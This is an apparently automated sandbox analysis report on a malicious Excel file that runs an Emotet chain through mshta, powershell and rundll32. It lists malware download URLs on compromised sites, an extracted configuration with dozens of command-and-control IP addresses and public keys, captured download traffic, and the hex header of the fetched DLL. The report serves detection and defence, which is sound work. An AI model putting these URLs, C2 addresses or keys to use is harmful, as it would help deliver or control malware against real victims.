Source: https://gudangtasorichina.com/wp-content/GG01c/PE3 | Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3 | Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/97v/PE3 | Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/ | Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/9 | Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/libraries/8s/PE3 | Avira URL Cloud: Label: malware
Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/ | Avira URL Cloud: Label: malware
Source: http://it-o.biz/bitrix/xoDdDe/ | Avira URL Cloud: Label: malware
Source: https://gudangtasorichina.com/wp-content/GG01c/ | Avira URL Cloud: Label: malware
Source: http://totalplaytuxtla.com/sitio/DgktL3zd/ | Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/libraries/8s/ | Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-cont | Avira URL Cloud: Label: malware
Source: http://jurnalpjf.lan.go.id/assets/iM/PE3 | Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3 | Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/ | Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3 | Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.html | Avira URL Cloud: Label: malware
Source: 12.2.rundll32.exe.1b0000.1.unpack | Malware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
Source: CJ68000754184.xls | Virustotal: Detection: 13%
Source: CJ68000754184.xls | ReversingLabs: Detection: 18%
Source: hostfeeling.com | Virustotal: Detection: 10%
Source: C:\ProgramData\JooSee.dll | Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: >ystem.pdbW | source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= | source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile | source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg | source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL | source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion | source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 | source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb | source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 | source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben | source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb | source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbgement.Automation.pdbBB | source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb | source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80
Source: global traffic | DNS query: name: hostfeeling.com
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80

                            Networking

                            barindex
Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.172:80
Source: Malware configuration extractor IPs: 160.16.102.168:80
Source: Malware configuration extractor IPs: 131.100.24.231:80
Source: Malware configuration extractor IPs: 200.17.134.35:7080
Source: Malware configuration extractor IPs: 207.38.84.195:8080
Source: Malware configuration extractor IPs: 212.237.56.116:7080
Source: Malware configuration extractor IPs: 58.227.42.236:80
Source: Malware configuration extractor IPs: 104.251.214.46:8080
Source: Malware configuration extractor IPs: 158.69.222.101:443
Source: Malware configuration extractor IPs: 192.254.71.210:443
Source: Malware configuration extractor IPs: 46.55.222.11:443
Source: Malware configuration extractor IPs: 45.118.135.203:7080
Source: Malware configuration extractor IPs: 107.182.225.142:8080
Source: Malware configuration extractor IPs: 103.75.201.2:443
Source: Malware configuration extractor IPs: 104.168.155.129:8080
Source: Malware configuration extractor IPs: 195.154.133.20:443
Source: Malware configuration extractor IPs: 159.8.59.82:8080
Source: Malware configuration extractor IPs: 110.232.117.186:8080
Source: Malware configuration extractor IPs: 45.142.114.231:8080
Source: Malware configuration extractor IPs: 41.76.108.46:8080
Source: Malware configuration extractor IPs: 203.114.109.124:443
Source: Malware configuration extractor IPs: 50.116.54.215:443
Source: Malware configuration extractor IPs: 209.59.138.75:7080
Source: Malware configuration extractor IPs: 185.157.82.211:8080
Source: Malware configuration extractor IPs: 164.68.99.3:8080
Source: Malware configuration extractor IPs: 162.214.50.39:7080
Source: Malware configuration extractor IPs: 138.185.72.26:8080
Source: Malware configuration extractor IPs: 178.63.25.185:443
Source: Malware configuration extractor IPs: 51.15.4.22:443
Source: Malware configuration extractor IPs: 81.0.236.90:443
Source: Malware configuration extractor IPs: 216.158.226.206:443
Source: Malware configuration extractor IPs: 45.176.232.124:443
Source: Malware configuration extractor IPs: 162.243.175.63:443
Source: Malware configuration extractor IPs: 212.237.17.99:8080
Source: Malware configuration extractor IPs: 45.118.115.99:8080
Source: Malware configuration extractor IPs: 129.232.188.93:443
Source: Malware configuration extractor IPs: 173.214.173.220:8080
Source: Malware configuration extractor IPs: 178.79.147.66:8080
Source: Malware configuration extractor IPs: 176.104.106.96:8080
Source: Malware configuration extractor IPs: 51.38.71.0:443
Source: Malware configuration extractor IPs: 173.212.193.249:8080
Source: Malware configuration extractor IPs: 217.182.143.207:443
Source: Malware configuration extractor IPs: 212.24.98.99:8080
Source: Malware configuration extractor IPs: 159.89.230.105:443
Source: Malware configuration extractor IPs: 79.172.212.216:8080
Source: Malware configuration extractor IPs: 212.237.5.209:443
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1 Host: 91.240.118.172 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /assets/iM/ HTTP/1.1 Host: jurnalpjf.lan.go.id Connection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Fri, 28 Jan 2022 20:18:49 GMT Server: Apache/2.4.6 (CentOS) PHP/7.4.27 X-Powered-By: PHP/7.4.27 Set-Cookie: 61f44fa975c8c=1643401129; expires=Fri, 28-Jan-2022 20:19:49 GMT; Max-Age=60; path=/ Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Fri, 28 Jan 2022 20:18:49 GMT Expires: Fri, 28 Jan 2022 20:18:49 GMT Content-Disposition: attachment; filename="KfCx9N.dll" Content-Transfer-Encoding: binary Content-Length: 548864 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1 Accept: */* Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 91.240.118.172 Connection: Keep-Alive
Source: Joe Sandbox View ASN Name: OnlineSASFR OnlineSASFR
Source: Joe Sandbox View ASN Name: S-NET-ASPL S-NET-ASPL
Source: Joe Sandbox View IP Address: 195.154.133.20 195.154.133.20
Source: Joe Sandbox View IP Address: 185.157.82.211 185.157.82.211
Source: unknown Network traffic detected: IP country count 21
Source: powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172
Source: mshta.exe, 00000004.00000002.445696631.0000000000396000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.441775503.00000000002F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.445492110.000000000029E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.html
Source: CJ68000754184.xls.0.dr String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlB
Source: mshta.exe, 00000004.00000002.445452336.0000000000260000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlWinSta0
Source: mshta.exe, 00000004.00000002.445492110.000000000029E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.html_
Source: mshta.exe, 00000004.00000002.445492110.000000000029E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlb
Source: mshta.exe, 00000004.00000003.420330399.00000000002E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmld
Source: mshta.exe, 00000004.00000003.423260829.00000000032DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlfunction
Source: mshta.exe, 00000004.00000003.422456833.00000000032D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html
Source: mshta.exe, 00000004.00000002.446063365.00000000039DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmll
Source: mshta.exe, 00000004.00000002.445452336.0000000000260000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlmshta
Source: mshta.exe, 00000004.00000002.445509209.00000000002BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.443936246.00000000002B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlngs
Source: powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.p
Source: powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.png
Source: powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.pngPE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://activetraining.sytes.net/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://activetraining.sytes.net/libraries/8s/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://activetraining.sytes.net/libraries/8s/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bimesarayenovin.ir/wp-adm
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.suk
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.sukoburu-secure.com
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gardeningfilm.com/wp-cont
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com/wp-admin/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://it-o.biz/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://it-o.biz/bitrix/xoDdDe/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://it-o.biz/bitrix/xoDdDe/PE3
Source: powershell.exe, 00000006.00000002.685196853.00000000037CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id/asset
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://maxtdeveloper.com/okw9yx/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://totalplaytuxtla.com/sitio
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inablr.com/elenctic/f
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3
Source: powershell.exe, 00000006.00000002.677562211.00000000002AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000006.00000002.677314579.0000000000260000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://w
Source: powershell.exe, 00000006.00000002.677562211.00000000002AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: mshta.exe, 00000004.00000003.420738023.0000000003A2C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com
Source: mshta.exe, 00000004.00000002.446348661.0000000003CAA000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com/
Source: mshta.exe, 00000004.00000003.441443397.0000000003AAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420217264.0000000003AAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446302477.0000000003AAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com/ll
Source: mshta.exe, 00000004.00000003.441588224.0000000003A9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446294886.0000000003A9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420167396.0000000003A9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.443804667.0000000003A9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com/r
Source: mshta.exe, 00000004.00000003.420287820.0000000003A31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.comP
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gudangtasorichina.com/wp
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-eg.com/mlzkir/9
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-eg.com/mlzkir/97v/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-eg.com/mlzkir/97v/PE3
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm
Source: unknown DNS traffic detected: queries for: hostfeeling.com
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv,
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1 Accept: */* Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 91.240.118.172 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1 Host: 91.240.118.172 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /assets/iM/ HTTP/1.1 Host: jurnalpjf.lan.go.id Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: mshta.exe, 00000004.00000003.441733787.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.443968366.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420316419.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.445522967.00000000002CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000003.441733787.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.443968366.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420316419.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.445522967.00000000002CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud

Source: Yara match File source: 10.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
